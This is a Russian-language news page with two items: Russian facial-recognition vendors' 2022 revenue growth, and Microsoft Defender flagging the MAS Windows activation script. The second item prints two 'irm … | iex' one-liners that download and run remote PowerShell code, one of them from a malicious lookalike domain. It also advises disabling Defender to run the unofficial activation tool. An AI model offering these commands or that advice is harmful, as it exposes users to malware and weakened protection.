Выручка российских разработчиков ИИ для распознавания лиц выросла на треть

Выручка российских разработчиков ИИ для распознавания лиц выросла на треть

Выручка российских разработчиков ИИ для распознавания лиц выросла на треть

Доходы российских поставщиков решений по распознаванию лиц прибавили в минувшем году 30–35%. Экспорт растет в страны Ближнего Востока, Юго-Восточной Азии, в Индию и Южную Америку. Но есть и вендоры, недосчитавшиеся прибыли за рубежом.

О финансовых итогах года для рынка российских решений в области распознавания лиц пишет “Ъ”.

Выручка компании VisionLabs, по словам гендиректора Дмитрия Маркова, в 2022 году составила 1,4 млрд руб. Это на 30% больше результатов за 2021 год.

“В этом году мы продолжили международную экспансию, рынки Южной Америки, Ближнего Востока и Юго-Восточной Азии всегда были для VisionLabs ключевыми”, — говорит Марков.

Выручка NtechLab в 2022 году увеличилась на 35%, причем почти удвоились международные продажи, рассказал представитель компании. По его словам, на внешних рынках доход увеличивается благодаря новым проектам на Ближнем Востоке, в Юго-Восточной Азии и СНГ.

“Всего в 2022 году решения были проданы в 26 стран”, — уточнили в NtechLab.

Однако доходы за рубежом выросли не у всех отечественных разработчиков решений для распознавания лиц.

Так, по словам гендиректора RecFaces Тамары Морозовой, “из-за общей геополитической ситуации многие рыночные механики перестали работать, в связи с чем пришлось заново выводить бренд на зарубежные рынки”.

Чтобы сохранить клиентский сервис в уже запущенных зарубежных проектах, RecFaces создала “автономную компанию” в Дубае.

“После этой процедуры мы успешно реализовали ряд проектов в Египте, Саудовской Аравии, Гватемале и зашли на рынок Индии”, — уточняет Морозова.

Заработок на международных проектах в 2022 году, по сравнению с российским, оказался ниже прогнозируемого на 30–40%. На внутреннем рынке, говорит топ-менеджер, выручка выросла в пять раз.

Сегмент решений в области искусственного интеллекта в целом “выглядит ключевым для достижения лидерства в новом технологическом укладе”, поэтому отрасль растет в этом направлении во всех ведущих странах мира, поясняет президент НП “Руссофт” Валентин Макаров.

По его информации, несмотря на санкции, российские разработчики не потеряли клиентов в других странах, но для этого пришлось локализовать офисы продаж.

Сами вендоры объясняют привлекательность российских разработок ценовой политикой и качеством.

Добавим, вместе с решениями по распознаванию лиц активно развиваются технологии защиты от подобных систем. Так, израильские ученые летом разработали маску, способную обмануть камеры видеонаблюдения.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru